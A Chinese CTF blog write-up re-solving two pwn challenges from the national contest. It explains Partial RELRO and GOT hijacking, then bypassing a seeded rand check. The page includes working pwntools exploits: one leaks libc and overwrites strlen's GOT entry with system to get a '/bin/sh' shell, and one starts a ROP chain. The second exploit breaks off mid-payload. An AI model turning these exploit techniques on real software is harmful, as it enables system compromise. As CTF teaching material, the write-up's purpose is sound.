



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="" href="http://example.com/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="" href="http://example.com/atom.xml" />
<link rel="alternate" type="application/json" title="" href="http://example.com/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="pie,got改写,随机数检查" />


<link rel="canonical" href="http://example.com/2023/08/03/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/">



  <title>
国赛复现 - 复现 - PWN的学习 |
yhuanhuan =  = 不在能知，乃在能行</title>
<meta name="generator" content="Hexo 6.3.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">国赛复现
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2023-08-03 17:17:58">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2023-08-03T17:17:58+08:00">2023-08-03</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>4.6k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>4 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">yhuanhuan</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://s2.loli.net/2023/08/04/Me2Cmi6yuWvhqKF.png"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/08/03/1worZdUHTMtXeP3.png"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/08/03/KXvdO79oYyh2ZI5.png"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/08/03/c8LzaYO7NRj2Gmi.png"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/08/04/caejg5tYskU186E.png"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/08/03/nUh9xrjosZA6KBg.png"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/" itemprop="item" rel="index" title="分类于 PWN的学习"><span itemprop="name">PWN的学习</span></a>
<meta itemprop="position" content="1" /></span>
<i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/%E5%A4%8D%E7%8E%B0/" itemprop="item" rel="index" title="分类于 复现"><span itemprop="name">复现</span></a>
<meta itemprop="position" content="2" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="http://example.com/2023/08/03/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/huanhuan.png">
    <meta itemprop="name" content="yhuanhuan">
    <meta itemprop="description" content="不在能知，乃在能行, 欢迎来到Huan的笔记空间~这里主要会记录pwn笔记🌸">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="国赛题复现"><a class="markdownIt-Anchor" href="#国赛题复现">#</a> 国赛题复现</h1>
<p>不同地区的国赛题，进行复现。— 简单 pwn 题</p>
<h3 id="华北赛区"><a class="markdownIt-Anchor" href="#华北赛区">#</a> 华北赛区：</h3>
<h3 id="relro保护机制"><a class="markdownIt-Anchor" href="#relro保护机制">#</a> RELRO 保护机制</h3>
<p><strong>1.RELRO 的保护机制可用于防护 <code>GOT hijacking</code> ，其全名为 <code>Relocation Read-Only</code> 。</strong></p>
<p><strong>2. 本题中 <code>checksec</code>  中为 <code>Partial RELRO</code> ，这种情况下， <code>GOT</code>  可写，即存在 <code>GOT hijacking</code>  的漏洞</strong></p>
<p><strong>3. 而保护的方式是设置为 <code>Full RELRO</code> ，这种情况下不会出现 <code>lazy binding</code> ，因为在 <code>Load time</code>  时会将所有 <code>funciton resolve</code>  完毕，并设置 <code>GOT</code>  不可写。</strong></p>
<p><img data-src="/img/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/image-20230717090133980.png" alt="image-20230717090133980"></p>
<p>给到的附件是这两个。</p>
<h5 id="检查程序"><a class="markdownIt-Anchor" href="#检查程序">#</a> 检查程序</h5>
<p><img data-src="/img/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/image-20230717090248188.png" alt="image-20230717090248188"></p>
<p>开启了堆栈不可执行和 pie 保护。</p>
<p><img data-src="/img/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/image-20230717090403892.png" alt="image-20230717090403892"></p>
<p>普通的执行并没有发现什么东西</p>
<h5 id="放入ida"><a class="markdownIt-Anchor" href="#放入ida">#</a> 放入 IDA</h5>
<p><img data-src="/img/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/OLUQRFR5HLPTU%258MV3M%259%5DR.png" alt="img"></p>
<p>这是给到的几个函数</p>
<p><img data-src="/img/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/image-20230717090604786.png" alt="image-20230717090604786"></p>
<p><img data-src="/img/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/image-20230717090621694.png" alt="image-20230717090621694"></p>
<p><img data-src="/img/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/image-20230717090637164.png" alt="image-20230717090637164"></p>
<p>这是其中有用的函数，接下来进行分析</p>
<ol>
<li></li>
</ol>
<p>其中 v2 数组在他的索引 0 的位置有 puts 函数的地址。</p>
<p>main 函数显示调用了 96B 这个函数，96B 内有个 scanf 函数，他的参数是 %252s，这里要记住，要用到，往下看，还有是 sacnf，这里主要是绕过判断的。只要绕过这个判断，我们就能得到 v2 的索引 0 处的地址。</p>
<p><strong>参数 % s</strong><br>
<strong>% s 参数在 PWN 题中的应用应该是最常见的了。scanf (“% s”, a) 实际上与 gets 一样危险，均不会检查 a 的边界，出现在题中一定是一个可以进行栈溢出或堆溢出的重点。这里注意其与 read 函数相同，可以读取 \x00 后面的内容，仅将换行作为输入读取的结束标志。不过这里要注意的是，% s 参数会以空格作为分隔符，也就是说，如果输入中含有空格，那么空格前后的内容会被分配到不同的 % s 参数中。这一点在使用 scanf 进行溢出时需要注意，否则容易造成 ROP 链断裂等问题。</strong></p>
<p>里面 V4 是个局部变量，这样我们可以利用第一个 scanf 把它覆盖成 0。第一个函数我们思路有了，接下来就是第二个函数的思路。</p>
<ol start="2">
<li></li>
</ol>
<p>第三个 scanf，这是用来绕过判断的。一共有两个 read 函数，第一个 read 函数没啥用，有意思的就是第二个 read 函数。</p>
<pre><code>栈中的数组越界：
因为栈是向下增长的，在进入一个函数之前，会先把参数和下一步要执行的指令地址（通过call实现）压栈，在函数的入口会把ebp压栈，并把esp赋值给ebp，在函数返回的时候，将ebp值赋给esp，pop先前栈内的上级函数栈的基地址给ebp，恢复原栈基址，然后把调用函数之前的压入栈的指令地址pop出来（通过ret实现）。
栈是由高往低增长的，而数组的存储是由低位往高位存的，如果越界的话，会把当前函数的ebp和下一跳的指令地址覆盖掉，如果覆盖了当前函数的ebp，那么在恢复的时候esp就不能指向正确的地方，从而导致未可知的情况，如果下一跳的地址也被覆盖掉，那么肯定会导致crash。
</code></pre>
<p>所以通过第二个 read 函数，去控制修改地址。首先就是去做到覆盖，这种覆盖也是第一次见，是看 bss 段里大小去覆盖。</p>
<p><img data-src="/img/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/image-20230717143008203.png" alt="image-20230717143008203"></p>
<p>覆盖 0x1c 字节大小，覆盖完后去修改地址，但是因为 v0 是通过 rax 去存参的，所以需要去传两遍参，正好有两次传参机会，我们可以去修改 close 函数，变成一个我们想要去程序执行的函数。</p>
<p>这里我们要重新返回执行 A31 这个函数，接下来就是重头戏，去修改 got 表。</p>
<p><img data-src="/img/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/image-20230717143729215.png" alt="image-20230717143729215"></p>
<p>非常关键一点就是这里，我们可以修改 strlen 函数，变成 system 函数，在给他传个 bin/sh 即可</p>
<h5 id="exp"><a class="markdownIt-Anchor" href="#exp">#</a> exp</h5>
<figure class="highlight python"><figcaption data-lang="python"><span>n</span></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span></pre></td></tr><tr><td data-num="2"></td><td><pre>context<span class="token punctuation">(</span>log_level<span class="token operator">=</span><span class="token string">'debug'</span><span class="token punctuation">,</span>arch<span class="token operator">=</span><span class="token string">'amd64'</span><span class="token punctuation">,</span>os<span class="token operator">=</span><span class="token string">'linux'</span><span class="token punctuation">,</span>terminal<span class="token operator">=</span><span class="token punctuation">[</span><span class="token string">'tmux'</span><span class="token punctuation">,</span><span class="token string">'split'</span><span class="token punctuation">,</span><span class="token string">'-h'</span><span class="token punctuation">]</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="3"></td><td><pre>local <span class="token operator">=</span> <span class="token number">2</span></pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token keyword">if</span> local <span class="token operator">==</span> <span class="token number">1</span><span class="token punctuation">:</span></pre></td></tr><tr><td data-num="5"></td><td><pre>    io <span class="token operator">=</span> remote<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="6"></td><td><pre><span class="token keyword">else</span><span class="token punctuation">:</span></pre></td></tr><tr><td data-num="7"></td><td><pre>    io <span class="token operator">=</span> process<span class="token punctuation">(</span><span class="token string">'./pwn'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="8"></td><td><pre></pre></td></tr><tr><td data-num="9"></td><td><pre>libc <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'./libc.so.6'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="10"></td><td><pre></pre></td></tr><tr><td data-num="11"></td><td><pre>payload <span class="token operator">=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token punctuation">(</span><span class="token number">0xfc</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="12"></td><td><pre>io<span class="token punctuation">.</span>sendafter<span class="token punctuation">(</span><span class="token string">b'challen'</span><span class="token punctuation">,</span>payload<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="13"></td><td><pre></pre></td></tr><tr><td data-num="14"></td><td><pre>io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b'Good luck!\n'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="15"></td><td><pre>io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">b'22'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="16"></td><td><pre></pre></td></tr><tr><td data-num="17"></td><td><pre>io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b'gift:\n'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="18"></td><td><pre>puts_addr <span class="token operator">=</span> u64<span class="token punctuation">(</span>io<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">6</span><span class="token punctuation">)</span><span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span><span class="token string">b'\x00'</span><span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="19"></td><td><pre><span class="token keyword">print</span><span class="token punctuation">(</span><span class="token builtin">hex</span><span class="token punctuation">(</span>puts_addr<span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="20"></td><td><pre>libc_base <span class="token operator">=</span> puts_addr <span class="token operator">-</span> libc<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">'puts'</span><span class="token punctuation">]</span></pre></td></tr><tr><td data-num="21"></td><td><pre><span class="token keyword">print</span><span class="token punctuation">(</span><span class="token builtin">hex</span><span class="token punctuation">(</span>libc_base<span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="22"></td><td><pre>system <span class="token operator">=</span> libc_base <span class="token operator">+</span> libc<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">'system'</span><span class="token punctuation">]</span></pre></td></tr><tr><td data-num="23"></td><td><pre><span class="token keyword">print</span><span class="token punctuation">(</span><span class="token builtin">hex</span><span class="token punctuation">(</span>system<span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="24"></td><td><pre>strlen_addr <span class="token operator">=</span> libc_base <span class="token operator">+</span> libc<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">'strlen'</span><span class="token punctuation">]</span> </pre></td></tr><tr><td data-num="25"></td><td><pre><span class="token keyword">print</span><span class="token punctuation">(</span><span class="token builtin">hex</span><span class="token punctuation">(</span>strlen_addr<span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="26"></td><td><pre>io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b'index>>\n'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="27"></td><td><pre><span class="token comment"># sleep(0.1)</span></pre></td></tr><tr><td data-num="28"></td><td><pre>io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">b'5'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="29"></td><td><pre>io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b'input>>\n'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="30"></td><td><pre><span class="token comment"># gdb.debug()</span></pre></td></tr><tr><td data-num="31"></td><td><pre><span class="token comment"># gdb.attach(io)</span></pre></td></tr><tr><td data-num="32"></td><td><pre>paylaod <span class="token operator">=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token punctuation">(</span><span class="token number">0x1c</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">b'\x88\xff\xff\xff'</span></pre></td></tr><tr><td data-num="33"></td><td><pre>io<span class="token punctuation">.</span>send<span class="token punctuation">(</span>paylaod<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="34"></td><td><pre></pre></td></tr><tr><td data-num="35"></td><td><pre><span class="token comment"># gdb.attach(io)</span></pre></td></tr><tr><td data-num="36"></td><td><pre><span class="token comment"># io.recvuntil(b'bye~\n')</span></pre></td></tr><tr><td data-num="37"></td><td><pre><span class="token comment"># payload1 = b'\xe0\xef'</span></pre></td></tr><tr><td data-num="38"></td><td><pre>io<span class="token punctuation">.</span>sendafter<span class="token punctuation">(</span><span class="token string">b'bye~\n'</span><span class="token punctuation">,</span><span class="token string">b'\x31\x0a'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="39"></td><td><pre></pre></td></tr><tr><td data-num="40"></td><td><pre>io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">b'5'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="41"></td><td><pre>payload <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token string">b'c'</span><span class="token punctuation">)</span><span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">0x1c</span><span class="token punctuation">,</span><span class="token string">b'a'</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">b'\x78\xff\xff\xff'</span></pre></td></tr><tr><td data-num="42"></td><td><pre>io<span class="token punctuation">.</span>sendafter<span class="token punctuation">(</span><span class="token string">b'input>>\n'</span><span class="token punctuation">,</span>payload<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="43"></td><td><pre></pre></td></tr><tr><td data-num="44"></td><td><pre>io<span class="token punctuation">.</span>sendafter<span class="token punctuation">(</span><span class="token string">b'bye~\n'</span><span class="token punctuation">,</span>p64<span class="token punctuation">(</span>system<span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token punctuation">:</span><span class="token number">3</span><span class="token punctuation">]</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="45"></td><td><pre><span class="token comment"># gdb.attach(io)</span></pre></td></tr><tr><td data-num="46"></td><td><pre>io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">b'5'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="47"></td><td><pre>io<span class="token punctuation">.</span>sendafter<span class="token punctuation">(</span><span class="token string">b'input>>\n'</span><span class="token punctuation">,</span><span class="token string">b'/bin/sh\x00'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="48"></td><td><pre><span class="token comment"># io.send(b'a')</span></pre></td></tr><tr><td data-num="49"></td><td><pre>io<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr></table></figure><h3 id="华东赛区"><a class="markdownIt-Anchor" href="#华东赛区">#</a> 华东赛区：</h3>
<h5 id="检查程序-2"><a class="markdownIt-Anchor" href="#检查程序-2">#</a> 检查程序：</h5>
<p><img data-src="/img/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/image-20230722171805702.png" alt="image-20230722171805702"></p>
<h5 id="执行程序"><a class="markdownIt-Anchor" href="#执行程序">#</a> 执行程序：</h5>
<p><img data-src="/img/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/image-20230722171849970.png" alt="image-20230722171849970"></p>
<h5 id="放入ida-2"><a class="markdownIt-Anchor" href="#放入ida-2">#</a> 放入 IDA：</h5>
<p><img data-src="/img/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/image-20230722172024544.png" alt="image-20230722172024544"></p>
<h5 id="发现漏洞函数"><a class="markdownIt-Anchor" href="#发现漏洞函数">#</a> 发现漏洞函数：</h5>
<p><img data-src="/img/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/image-20230722172050505.png" alt="image-20230722172050505"></p>
<p>整体思路，绕过随机数检查判断，到达漏洞函数，获取 shell。seed 种子是 4 字节大小要注意</p>
<h5 id="exp-2"><a class="markdownIt-Anchor" href="#exp-2">#</a> exp:</h5>
<figure class="highlight python"><figcaption data-lang="python"><span>n</span></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token keyword">from</span> pwn <span class="token keyword">import</span><span class="token operator">*</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token keyword">from</span> ctypes <span class="token keyword">import</span><span class="token operator">*</span></pre></td></tr><tr><td data-num="3"></td><td><pre></pre></td></tr><tr><td data-num="4"></td><td><pre>context<span class="token punctuation">(</span>arch<span class="token operator">=</span><span class="token string">'amd64'</span><span class="token punctuation">,</span>os<span class="token operator">=</span><span class="token string">'linux'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="5"></td><td><pre>context<span class="token punctuation">.</span>log_level<span class="token operator">=</span><span class="token string">'debug'</span></pre></td></tr><tr><td data-num="6"></td><td><pre>context<span class="token punctuation">.</span>terminal<span class="token operator">=</span><span class="token punctuation">[</span><span class="token string">'tmux'</span><span class="token punctuation">,</span><span class="token string">'splitw'</span><span class="token punctuation">,</span><span class="token string">'-h'</span><span class="token punctuation">]</span></pre></td></tr><tr><td data-num="7"></td><td><pre></pre></td></tr><tr><td data-num="8"></td><td><pre>local <span class="token operator">=</span> <span class="token number">2</span></pre></td></tr><tr><td data-num="9"></td><td><pre><span class="token keyword">if</span> local <span class="token operator">==</span> <span class="token number">1</span><span class="token punctuation">:</span></pre></td></tr><tr><td data-num="10"></td><td><pre>    p <span class="token operator">=</span> remote<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="11"></td><td><pre><span class="token keyword">else</span><span class="token punctuation">:</span></pre></td></tr><tr><td data-num="12"></td><td><pre>    p <span class="token operator">=</span> process<span class="token punctuation">(</span><span class="token string">'./vuln'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="13"></td><td><pre></pre></td></tr><tr><td data-num="14"></td><td><pre>libc <span class="token operator">=</span> cdll<span class="token punctuation">.</span>LoadLibrary<span class="token punctuation">(</span><span class="token string">'libc.so.6'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="15"></td><td><pre>elf <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'./vuln'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="16"></td><td><pre></pre></td></tr><tr><td data-num="17"></td><td><pre>ret <span class="token operator">=</span> <span class="token number">0x40101a</span></pre></td></tr><tr><td data-num="18"></td><td><pre>pop_rdi <span class="token operator">=</span> <span class="token number">0x00401443</span></pre></td></tr><tr><td data-num="19"></td><td><pre>puts_plt <span class="token operator">=</span> elf<span class="token punctuation">.</span>plt<span class="token punctuation">[</span><span class="token string">'puts'</span><span class="token punctuation">]</span></pre></td></tr><tr><td data-num="20"></td><td><pre>puts_got <span class="token operator">=</span> elf<span class="token punctuation">.</span>got<span class="token punctuation">[</span><span class="token string">'puts'</span><span class="token punctuation">]</span></pre></td></tr><tr><td data-num="21"></td><td><pre>main <span class="token operator">=</span> elf<span class="token punctuation">.</span>sym<span class="token punctuation">[</span><span class="token string">'main'</span><span class="token punctuation">]</span></pre></td></tr><tr><td data-num="22"></td><td><pre>gift <span class="token operator">=</span> <span class="token number">0x040125D</span></pre></td></tr><tr><td data-num="23"></td><td><pre>b <span class="token operator">=</span> libc<span class="token punctuation">.</span>srand<span class="token punctuation">(</span>libc<span class="token punctuation">.</span>time<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="24"></td><td><pre><span class="token comment"># gdb.attach(p)</span></pre></td></tr><tr><td data-num="25"></td><td><pre>payload <span class="token operator">=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token punctuation">(</span><span class="token number">14</span><span class="token punctuation">)</span><span class="token operator">+</span> p32<span class="token punctuation">(</span>libc<span class="token punctuation">.</span>time<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="26"></td><td><pre>p<span class="token punctuation">.</span>sendafter<span class="token punctuation">(</span><span class="token string">b'name:\n'</span><span class="token punctuation">,</span>payload<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="27"></td><td><pre><span class="token comment"># v6 = (libc.rand(b)-1) %100 +2</span></pre></td></tr><tr><td data-num="28"></td><td><pre><span class="token comment"># p.sendafter(b'number:\n',p32(v6))</span></pre></td></tr><tr><td data-num="29"></td><td><pre><span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">100</span><span class="token punctuation">)</span><span class="token punctuation">:</span></pre></td></tr><tr><td data-num="30"></td><td><pre>    v6 <span class="token operator">=</span> libc<span class="token punctuation">.</span>rand<span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">%</span><span class="token number">100</span> <span class="token operator">+</span> <span class="token number">1</span></pre></td></tr><tr><td data-num="31"></td><td><pre>    p<span class="token punctuation">.</span>sendafter<span class="token punctuation">(</span><span class="token string">b'number:\n'</span><span class="token punctuation">,</span>p32<span class="token punctuation">(</span>v6<span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="32"></td><td><pre></pre></td></tr><tr><td data-num="33"></td><td><pre><span class="token comment"># gdb.attach(p)</span></pre></td></tr><tr><td data-num="34"></td><td><pre>libc <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'./libc-2.27.so'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="35"></td><td><pre>p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b'your gift!\n'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="36"></td><td><pre>payload <span class="token operator">=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token punctuation">(</span><span class="token number">0x30</span><span class="token operator">+</span><span class="token number">0x8</span><span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>ret<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>pop_rdi<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>puts_got<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>puts_plt<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>gift<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="37"></td><td><pre>p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="38"></td><td><pre>puts_addr <span class="token operator">=</span> u64<span class="token punctuation">(</span>p<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">6</span><span class="token punctuation">)</span><span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span><span class="token string">b'\x00'</span><span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="39"></td><td><pre><span class="token keyword">print</span><span class="token punctuation">(</span><span class="token builtin">hex</span><span class="token punctuation">(</span>puts_addr<span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="40"></td><td><pre>libc_base <span class="token operator">=</span> puts_addr <span class="token operator">-</span> libc<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">'puts'</span><span class="token punctuation">]</span></pre></td></tr><tr><td data-num="41"></td><td><pre><span class="token keyword">print</span><span class="token punctuation">(</span><span class="token builtin">hex</span><span class="token punctuation">(</span>libc_base<span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="42"></td><td><pre>sys <span class="token operator">=</span> libc_base <span class="token operator">+</span> libc<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">'system'</span><span class="token punctuation">]</span></pre></td></tr><tr><td data-num="43"></td><td><pre><span class="token keyword">print</span><span class="token punctuation">(</span><span class="token builtin">hex</span><span class="token punctuation">(</span>sys<span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="44"></td><td><pre>binsh <span class="token operator">=</span> libc_base <span class="token operator">+</span> <span class="token builtin">next</span><span class="token punctuation">(</span>libc<span class="token punctuation">.</span>search<span class="token punctuation">(</span><span class="token string">b'/bin/sh'</span><span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="45"></td><td><pre><span class="token keyword">print</span><span class="token punctuation">(</span><span class="token builtin">hex</span><span class="token punctuation">(</span>binsh<span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="46"></td><td><pre></pre></td></tr><tr><td data-num="47"></td><td><pre></pre></td></tr><tr><td data-num="48"></td><td><pre>payload <span class="token operator">=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token punctuation">(</span><span class="token number">0x30</span><span class="token operator">+</span><span class="token number">0x8</span><span class="token punctuation">)</span><span class="token 